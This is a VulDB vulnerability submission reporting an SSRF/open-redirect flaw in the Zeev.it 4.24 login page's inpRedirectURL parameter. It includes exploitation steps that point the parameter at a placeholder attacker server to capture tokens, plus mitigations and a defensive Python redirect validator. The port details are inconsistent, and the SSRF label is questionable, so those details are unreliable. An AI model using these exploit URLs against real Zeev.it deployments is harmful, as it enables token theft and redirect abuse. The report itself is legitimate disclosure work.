Submission #511708: https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page

Title: https://stoque.com.br Zeev 4.24 Zeev.it SSRF via inpRedirectURL Parameter on the Login Page
Description: Proof of Concept (PoC) - SSRF on Zeev.it (Version 4.24)

PoC link: https://drive.google.com/file/d/17QAEbzVIjTUj8FDOVMwfl9-7j8LRcK4V/view?usp=sharing

About Zeev.it
Zeev.it is a business process automation (BPM) platform developed by Stoque (https://stoque.com.br/). It allows workflows to be created and managed in an intuitive way. Used by several organizations to optimize internal processes, the system provides functionality for task approval, document management and integration with other services.

Vulnerability Description
The vulnerability identified in the Zeev.it system allows a Server-Side Request Forgery (SSRF) attack through the inpRedirectURL parameter. An attacker can manipulate requests made by the application server and redirect them to external servers under their control.

Exploitation Scenario
During the analysis of the application, a task for approval was received in the Zeev.it system. The URL provided was:
https://vp4mtgxk.r.us-east-1.awstrack.me/L0/https:%2F%2Fish.zeev.it%2Fmy%2Ftasks/1/01000195488f2e53-225aba4a-ac85-4834-a12f-eb153cb5a24c-000000/fn3qgU20a7bgypJyFAQiBonoJ1s=415
After accessing this URL, it was identified that the application redirects to the following vulnerable endpoint:
https://domain.zeev.it/login?inpLostSession=1&inpRedirectURL=%2F2.0%2Ftask%3Fc%3DV2L3cAEPruaV76FQ2IrzlEgRiHoLXgqU9lFiu%252bLIBYh%252fdUmaQoUwIXKbXcO%252fSsvc

Step-by-Step Exploitation
1. Configure a server to capture SSRF requests:
   python3 -m http.server 8000
2. Create a malicious URL to force the server to connect to our control server:
   https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://<YOUR_SERVER>:9000/
3. Monitor incoming requests:
   SSRF server running on port 8000...
   SSRF Detected: x.x.x.x -> /?t=m5g3M3eI9/uHe92X...
The attack was also successfully performed using Burp Suite and Burp Collaborator, intercepting and modifying the request to test different domains and endpoints.

Impact
This vulnerability could allow an attacker to use the application server as a proxy to access other resources, masking their identity and potentially accessing sensitive information.

Recommendations
• Implement whitelisting to restrict redirects to trusted domains only.
• Validate and sanitize user-supplied input to the inpRedirectURL parameter.
• Monitor HTTP request logs for potential exploit attempts.
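A server-side validator for the inpRedirectURL parameter that implements the first two recommendations, added here as an example and not code from Zeev.it or Stoque; the allowed host ish.zeev.it, the function name and the fallback target are assumptions. It accepts only same-origin paths or https URLs on the allowlisted host (rewritten to a path), and falls back to "/" for everything else, including the http://x.x.x.x:8000 target from this report and protocol-relative or backslash variants.

```python
from urllib.parse import urlsplit, urlunsplit

# Hosts the login page may redirect to. Assumed value for this example;
# a real deployment would use its own hostname(s).
ALLOWED_HOSTS = {"ish.zeev.it"}
DEFAULT_TARGET = "/"


def safe_redirect_target(value, allowed_hosts=ALLOWED_HOSTS):
    """Return a redirect target that stays on the application, or DEFAULT_TARGET.

    Accepted: an absolute path starting with a single '/' (not '//' or '/\\'),
    or an https URL whose host is in the allowlist. Everything else is rejected:
    other schemes, unknown hosts, userinfo ('user@host'), odd ports, control chars.
    """
    if not value:
        return DEFAULT_TARGET
    value = value.strip()
    # Many clients treat backslash like slash, so '/\\evil' would become
    # protocol-relative in the browser; reject it and any CR/LF/NUL outright.
    if "\\" in value or any(c in value for c in "\r\n\x00"):
        return DEFAULT_TARGET

    parts = urlsplit(value)
    if not parts.scheme and not parts.netloc:
        # Relative reference: must be an absolute path, never '//host'.
        if value.startswith("/") and not value.startswith("//"):
            return value
        return DEFAULT_TARGET

    if parts.scheme != "https":
        return DEFAULT_TARGET
    try:
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return DEFAULT_TARGET
    if parts.username or parts.password or port not in (None, 443):
        return DEFAULT_TARGET
    if (parts.hostname or "") not in allowed_hosts:
        return DEFAULT_TARGET
    # Re-emit as a same-origin path so no third-party host reaches the client.
    return urlunsplit(("", "", parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs: the legitimate task path from the report and the PoC target.
    for v in ["/2.0/task?c=abc", "http://x.x.x.x:8000", "//evil.example/"]:
        print(repr(v), "->", safe_redirect_target(v))
```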
Source: https://ish.zeev.it/login?inpLostSession=1&inpRedirectURL=http://x.x.x.x:8000
User: Samuel Jesus (UID 81288)
Submission: 2025-02-28 15:55 (1 year ago)
Moderation: 2025-03-11 07:56 (11 days later)
Status: Accepted
VulDB Entry: 299217 [Stoque Zeev.it 4.24 Login Page /Login?inpLostSession=1 inpRedirectURL privilege escalation]
Points: 20